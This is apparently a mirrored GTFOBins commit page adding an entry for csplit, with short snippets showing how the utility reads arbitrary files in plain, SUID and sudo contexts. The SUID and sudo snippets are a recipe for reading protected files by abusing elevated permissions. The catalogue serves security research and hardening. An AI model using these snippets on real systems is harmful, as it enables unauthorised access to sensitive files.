mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
New command: csplit
This commit is contained in:
parent
55b7296d8e
commit
5a3e672d23
18
_gtfobins/csplit.md
Normal file
18
_gtfobins/csplit.md
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
---
|
Loading…
Reference in New Issue
Block a user